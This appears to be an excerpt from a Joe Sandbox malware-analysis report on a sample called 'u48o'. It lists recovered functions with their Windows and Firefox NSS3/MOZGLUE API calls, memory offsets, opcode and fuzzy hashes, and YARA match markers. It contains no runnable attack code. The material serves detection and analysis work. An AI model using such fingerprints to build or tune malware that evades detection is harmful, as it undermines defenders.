GetLastError.KERNEL32 ref: 6C30057A

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: 0f4ea0cdbd95bf6982146bffba549812d572b1a00ce9421abaf1bd9adf0ae1e2
Instruction ID: 45016e92d9889350af6228a6aa0be2dc3c621b2fe1a270e3f3ef76a441f96e89
Opcode Fuzzy Hash: 0f4ea0cdbd95bf6982146bffba549812d572b1a00ce9421abaf1bd9adf0ae1e2
Instruction Fuzzy Hash: 9B214C71B00218AFDB08DF69DC94AAEB7B8FF48308B108029E8099B351D731E906CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C33ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C33ACC2

Part of subcall function 6C312F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C312F0A
Part of subcall function 6C312F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C312F1D

Part of subcall function 6C312AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C310A1B,00000000), ref: 6C312AF0
Part of subcall function 6C312AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C312B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C33AD5E

Part of subcall function 6C3557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C31B41E,00000000,00000000,?,00000000,?,6C31B41E,00000000,00000000,00000001,?), ref: 6C3557E0
Part of subcall function 6C3557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C355843

CERT_DestroyCertList.NSS3(?), ref: 6C33AD36

Part of subcall function 6C312F50: CERT_DestroyCertificate.NSS3(?), ref: 6C312F65
Part of subcall function 6C312F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C312F83

free.MOZGLUE(?), ref: 6C33AD4F

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: f1e2e3e8c497593c004cddb1fb2e0b4e30550a3818444363e7992b03d60efbc5
Instruction ID: d7ff1001f33e22478e54dfd7567961a0ae3bfa4e7df35ea5a29c940297262844
Opcode Fuzzy Hash: f1e2e3e8c497593c004cddb1fb2e0b4e30550a3818444363e7992b03d60efbc5
Instruction Fuzzy Hash: A221C6B1D001648FEF11EFA4D9055EEB7B4EF05218F455068D8487B710FB36AA55CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C3524E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3524FF
EnterCriticalSection.KERNEL32(?), ref: 6C35250F
PR_Unlock.NSS3(?), ref: 6C35253C
PR_SetError.NSS3(00000000,00000000), ref: 6C352554

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: cc7bad3a2030405f879feffe75a83e926b740a736d60f5e2844c53290ead340e
Instruction ID: 9288bae8d313ba53a6774aa5e165332783a431422102b47ed37cb46d8b46c68c
Opcode Fuzzy Hash: cc7bad3a2030405f879feffe75a83e926b740a736d60f5e2844c53290ead340e
Instruction Fuzzy Hash: 9B11E972A00114ABDF00FF68DC459BB7B78EF4A328B854524EC48A7715E732E954CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C36ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C36F0AD,6C36F150,?,6C36F150,?,?,?), ref: 6C36ECBA

Part of subcall function 6C370FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3187ED,00000800,6C30EF74,00000000), ref: 6C371000
Part of subcall function 6C370FF0: PR_NewLock.NSS3(?,00000800,6C30EF74,00000000), ref: 6C371016
Part of subcall function 6C370FF0: PL_InitArenaPool.NSS3(00000000,security,6C3187ED,00000008,?,00000800,6C30EF74,00000000), ref: 6C37102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C36ECD1

Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C36ED02

Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C36ED5A

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 6dd0a28a2423f307d3537044e3ac02438bb95aa5048f1f708e6ce7ae9d6bf559
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 032184B19007429FE700CF26DD44B52B7E4BFA5348F15C215E81C87A61F771E594CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C39EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EE14

Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15

memcpy.VCRUNTIME140(?,?,6C389767,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EE33

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: ed43b5174f5345b845a14cf6a59121e422115f84f76986ba77be71aeebf55e8d
Instruction ID: eec404b1edce13945f3cf1cc50ca673ef7fb9bb30c248981a314a80c0ba11a9e
Opcode Fuzzy Hash: ed43b5174f5345b845a14cf6a59121e422115f84f76986ba77be71aeebf55e8d
Instruction Fuzzy Hash: 371173B5E04706ABEB109EA5DC84B46B3A8FB0435DF244535E91996A40F331E4648FE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C3BAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C3A5F17,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C3A5F17,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BACDB

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 64a8eb071193a8928ab685f04e67a1ed6755491eb686a4bf67c19c5c8bc6e9ec
Instruction ID: f8c85c04c2ff6f5fbc85438109714107066fd6adc6f136a6624d8e1c667a8ecf
Opcode Fuzzy Hash: 64a8eb071193a8928ab685f04e67a1ed6755491eb686a4bf67c19c5c8bc6e9ec
Instruction Fuzzy Hash: C1015EB1701B419BEB50EF6AD908767B7E8BF10A59B104839D89AD3E00E731F054CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00416F20 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00416F72
lstrcat.KERNEL32(00000000), ref: 00416F82

Strings

6F@, xrefs: 00416F29
6F@, xrefs: 00416F37

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: 6F@$6F@
API String ID: 3905823039-140834422
Opcode ID: b5f8bb415bf48ce7be5bc642ec728c9009fc5aef9801c6ea708fecfa6406f1e0
Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
Opcode Fuzzy Hash: b5f8bb415bf48ce7be5bc642ec728c9009fc5aef9801c6ea708fecfa6406f1e0
Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6C3724E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C34C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C34C154,?), ref: 6C3724FA
PORT_Alloc_Util.NSS3(00000000,?,6C34C154,?), ref: 6C372509

Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C372525
free.MOZGLUE(00000000), ref: 6C372532

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: 300a03cb32c9d27fdb1d8011d23cbaeb60a5ee49bd48088d18be717290d41971
Instruction ID: c388b3922798aa8204e63949097ac156b7bc16720428dfd099199272744861e5
Opcode Fuzzy Hash: 300a03cb32c9d27fdb1d8011d23cbaeb60a5ee49bd48088d18be717290d41971
Instruction Fuzzy Hash: D9F090B23061217BFE2065BB6C09E777AACDB46AFCB140231BD28C66C1E956C80186F5

Uniqueness

Uniqueness Score: -1.00%

Function 6C3A0450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C3A4710,?,000F4240,00000000), ref: 6C3A046B
GetLastError.KERNEL32(?,6C3A4710,?,000F4240,00000000), ref: 6C3A0479

Part of subcall function 6C3BBF80: TlsGetValue.KERNEL32(00000000,?,6C3A461B,-00000004), ref: 6C3BC244

PR_Unlock.NSS3(40C70845,?,6C3A4710,?,000F4240,00000000), ref: 6C3A0492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C3A4710,?,000F4240,00000000), ref: 6C3A04A5

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: da89fedd3e544225d4cd28c6fba481609f24bf4befb40888e06bb1b227b7405b
Instruction ID: 867e5635ea16caee32a8b71f15d29e4cf3c04ebac15f83288fb52824504d8985
Opcode Fuzzy Hash: da89fedd3e544225d4cd28c6fba481609f24bf4befb40888e06bb1b227b7405b
Instruction Fuzzy Hash: 32F0B470B043455FEF10AAF59C58B2A36ADFB1120DF048434E84BD7E50EE32E4658D22

Uniqueness

Uniqueness Score: -1.00%

Function 00414450 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
HeapAlloc.KERNEL32(00000000), ref: 00414464
GetLocalTime.KERNEL32(?), ref: 00414471
wsprintfA.USER32 ref: 004144A0

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 6C42CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C42CC61
free.MOZGLUE ref: 6C42CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C42CC80
free.MOZGLUE(?), ref: 6C42CC87

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: a639a6db3df8d9ce1b3cc75999c38def4955ca0f5d9bdf607bdfb443b24e8e3b
Instruction ID: 9dcc65bacf2c9a3b747b0b7c48c34272af628e812aad8e7bb96309dd3dd12e3a
Opcode Fuzzy Hash: a639a6db3df8d9ce1b3cc75999c38def4955ca0f5d9bdf607bdfb443b24e8e3b
Instruction Fuzzy Hash: 0AE030767016089BCF10EFA9DC4489677ACEE496703150525EA91C3700D231F905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C364D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C364D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C364DE6

Strings

%d.%d, xrefs: 6C364DDE

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: d50c8c5f81c9d3bd0baf7bd7265747ee0ec00b2aea7afe5105b652ce126b35b7
Instruction ID: 0a56f428cfc250ebb8c5a23ffa383c1500ada6d1badc75b15b452c4f47e2d54a
Opcode Fuzzy Hash: d50c8c5f81c9d3bd0baf7bd7265747ee0ec00b2aea7afe5105b652ce126b35b7
Instruction Fuzzy Hash: 3231E6B2D002186AEB10DBA6DC11FFF7668EF40308F010429E9459BB86EB319905CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00415260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Strings

#F@, xrefs: 004152B1, 004152E1, 004152E4
#F@, xrefs: 0041526C, 004152E5, 004152F0, 00415304, 004152D3, 004152F3

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: #F@$#F@
API String ID: 62757014-661595268
Opcode ID: 9c4578540c9875f99c455bf3a30fbf78bf8634aa42411cf7279c1c4ce97c61ea
Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
Opcode Fuzzy Hash: 9c4578540c9875f99c455bf3a30fbf78bf8634aa42411cf7279c1c4ce97c61ea
Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6C384CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('88l,00000000,00000000,?,?,6C383827,?,00000000), ref: 6C384D0A

Part of subcall function 6C370840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C3708B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C384D22

Part of subcall function 6C36FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C311A3E,00000048,00000054), ref: 6C36FD56

Strings

'88l, xrefs: 6C384D07

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '88l
API String ID: 1521942269-1698852155
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 744e68323cd8c2a717fc899faf3880dc6e2c1ffff59e4542f3f899b1d6ed7c94
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 84F0623260222467EB104D6ABC90B4376DC9B456BDF140271ED28CBB82E622DD08CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 6C370DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C370DF5
TlsGetValue.KERNEL32 ref: 6C370E2D
TlsGetValue.KERNEL32 ref: 6C370E58
TlsGetValue.KERNEL32 ref: 6C370E84

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: f983fc960293acf796dbc5aa92589b989f8bc89eed776311122d5f0beb126349
Instruction ID: 4438ea1782a3005983262387c54637cd6dd7164469050a34e74395082cf1ce17
Opcode Fuzzy Hash: f983fc960293acf796dbc5aa92589b989f8bc89eed776311122d5f0beb126349
